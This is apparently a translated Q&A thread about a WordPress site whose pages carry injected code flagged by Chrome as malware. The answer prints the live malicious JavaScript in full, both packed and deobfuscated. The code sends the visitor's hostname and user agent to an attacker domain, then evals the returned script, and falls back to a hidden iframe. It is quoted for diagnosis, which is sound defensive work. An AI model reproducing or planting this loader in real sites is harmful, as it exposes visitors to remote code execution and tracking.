前面的网站包含恶意软件

时间:2015-10-21 20:19:12

标签: wordpress malware

我在使用WordPress页面删除时出现错误,似乎网站2zz3.gq正在被注入"进入请求,但我不确定何时或如何。

当我尝试在Chrome上加载页面时,我看到"前面的网站包含恶意软件" 错误:

enter image description here

但我发现Firefox或其他浏览器没有错误。 如何解决此问题? 到目前为止,我已经尝试过:

  • 运行WordFence插件以删除恶意软件(未发现感染)
  • 运行Sucuri安全插件(也没有发现威胁)
  • 我阻止了来自网站2zz3.gq(显然是来自俄罗斯的服务器)的传入请求,但该错误仍会显示在Chrome上。

可以请某人就这个问题给我一些建议吗?

1 个答案:

答案 0 :(得分:3)

现在是否已禁用该插件?

检查您网站的来源,看看它是否已经过任何修改。

最简单的可能是恢复备份,以确保您不会错过任何恶意更改。

警告

这是恶意代码。我已经把它放在这里用于解释目的,但我建议您不要执行此

它并不像有人可能会意外点击的链接那么糟糕,而且我觉得这个警告应该足以让那些决定将它粘贴到他们的JS控制台中的人似乎是个好主意......

当我packed您的网站时,我会看到以下curl代码块。

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))

转换为

function _pref_xxs_getbyte(t,A)
    {
    var _=t.charCodeAt(A);
    if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
    return _
}
function _pref_xxs_encode64(t)
    {
    if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
    t=String(t);
    var A,_,e=[],r=t.length-t.length%3;
    if(0===t.length)return t;
    for(A=0;
    r>A;
    A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
    switch(t.length-r)
        {
        case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
        break;
        case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
    }
    return e.join("")
}
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
function _pref_xxs_getXmlHttp()
    {
    var xmlhttp;
    try
        {
        xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
    }
    catch(e)
        {
        try
            {
            xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
        }
        catch(E)
            {
            xmlhttp=false
        }
    }
    if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
        {
        xmlhttp=new XMLHttpRequest()
    }
    return xmlhttp
}
function _pref_xxs_extractScript(src)
    {
    start=src.indexOf('\<script');
    if(start==-1)return'';
    start=src.indexOf('>',start);
    if(start==-1)return'';
    start++;
    end=src.indexOf('\<\/script\>',start);
    if(end==-1)return'';
    return src.substring(start,end)
}
function _pref_xxs_processMacro(src)
    {
    if(src.indexOf('%ENCURL%')==-1)return src;
    return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
function _pref_xxs_getCookie(name)
    {
    var cookie=" "+document.cookie;
    var search=" "+name+"=";
    var setStr=null;
    var offset=0;
    var end=0;
    if(cookie.length>0)
        {
        offset=cookie.indexOf(search);
        if(offset!=-1)
            {
            offset+=search.length;
            end=cookie.indexOf(";
            ",offset);
            if(end==-1)
                {
                end=cookie.length
            }
            setStr=unescape(cookie.substring(offset,end))
        }
    }
    return(setStr)
}
document.write('<span id="statspan_0_1"></span>');
if(_pref_xxs_getCookie('stat01')==null)
    {
    var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
    url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
    url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
    try
        {
        var xmlhttp=_pref_xxs_getXmlHttp();
        xmlhttp.open('GET',url,true);
        xmlhttp.onreadystatechange=function()
            {
            if(xmlhttp.readyState==4&&xmlhttp.status==200)
                {
                src=_pref_xxs_processMacro(xmlhttp.responseText);
                document.getElementById("statspan_0_1").innerHTML=src;
                code=_pref_xxs_extractScript(src);
                if(code.length>0)eval(code)
            }
        };
        xmlhttp.send(null)
    }
    catch(e)
        {
        document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
    }
}

注意这一行

var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';

实际构建了2***.gq网址。 1

如果您没有设置stat01 Cookie,则会从那里加载stat.php(可能是恶意JS源代码)并使用eval执行它。

在发出请求的过程中,它还会发送一些用户数据(用于指标,加载适当的漏洞利用代码或其他内容?),包括当前主机名和用户浏览器的用户数。 / p>

请注意,如果此操作失败,它还会依赖于在l2***.ga/counter.php中的其他域iframe 1 上加载网址。

故意破坏

1 链接,如果您有兴趣,请参阅来源